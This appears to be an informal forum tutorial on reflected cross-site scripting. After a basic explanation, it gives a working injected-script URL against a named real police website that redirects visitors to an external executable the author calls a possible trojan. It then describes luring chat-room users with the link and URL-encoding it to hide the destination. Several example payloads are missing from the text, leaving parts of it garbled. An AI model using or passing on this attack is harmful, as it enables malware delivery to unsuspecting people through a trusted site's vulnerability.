Basic XSS tutorial
Neither the author or the website where this tutorial is published is responsible for any actions you take with the information in this tutorial..This tutorial has been written for educational purposes only..
In this tutorial i will show youhow XSS works and how you can use it..
What is an XSS ?
An XSS is an vurnability in an web-applicationthat can cause hackers to execute scripts on the client side…
Dangers of XSS…
these day’s browser keep some of the dangers of XSS outside..Like.. if an script want to write/edit edit files on the computer it needs extra permission from the user…or by some browsers it just get blocked…
How does XSS Work ?
if an user posts something to an webpage ( ex: http://search.live.com/ )the search engine shows what KeyWord the user typed..
If an web-aplication processes the input from the user
without filtering, for example the user input: xss-tutorial
it will be like this in the source:……..
Your keyword was: xss-tutotorial
In this case its seems very normal:
it would be in the source like this:…..
Your keyword was:
this doesnt look very normal on the screen:
Well this happens when an web-application ( like an search engine ) doesnt filter the user-input:
2. the search engine checks if youre keywords matches the records, and then builds an page with the results..
3. the SearchEngine builds the rest of the page ( like ads and stuff ).. and s directly ( without filtering it first ) puts your keyword in the page too…
4. The webserver sends the page ( source ) to you…
5. Your browser reads every line/code from the source and shows it on the screen.
How to find and use xss ?
XSS is dangrous because people get mislead easily..There are scripts that like. steal user-cookies …hackers can abuse those stolen cookies..Im not going further on cookie-stealing, but i will giveyou an other example on how to abuse xss vurnability’s…Like i said, you can mislead people by using those XSS Vurnability’s…You can someone to make download something,By using an XSS on an trusted website..
You won’t expect that downloading something from http://www.lapdonline.org/, would be somekind of malware ( trojan or something )..Well lets see if we can change that…We gonna search for an XSS vurnabiity on that website…Goto.. http://www.lapdonline.org/You will see an search functions under the banner..Lets see if the search engine filters our keyword…Enter as keyword:
Click then on GO..Yeahh, it worked !
Well how can we abuse this ??
go back to:
http://www.lapdonline.org/And enter that script in the search engine and click on go…
ohk at there.. we have been redirected to our file…This file named: policescanner.exe , could be an trojanYou could go in to an chat room or communityand say its an police scanner !You would just gave the link in your browser then, http://www.lapdonline.org/search_results/search/&view_all=1&chg_filter=1&searchType=content_basic&search_terms=%3Cscript%3Edocument.location=%22http://www.technoplex.co.cc/policescanner.exe%22;%3C/script%3E
People mostly read the first part of the link, before clicking on it… in this case: http://www.lapdonline.org/
Well, they gonna think its an LAPD website, and your talking about an police scanner, so why not download it ?Maybe when someone looks closely and he might see the link to your trojan…
http://tuts.djoedjoe.com/basicxss/eng/policescanner.exeand they will notice its fake…but no worry’s, with an URL-Encoder you can ‘mask’ that …
dats it for now…If you need anything more regarding XSS feel free to reply here.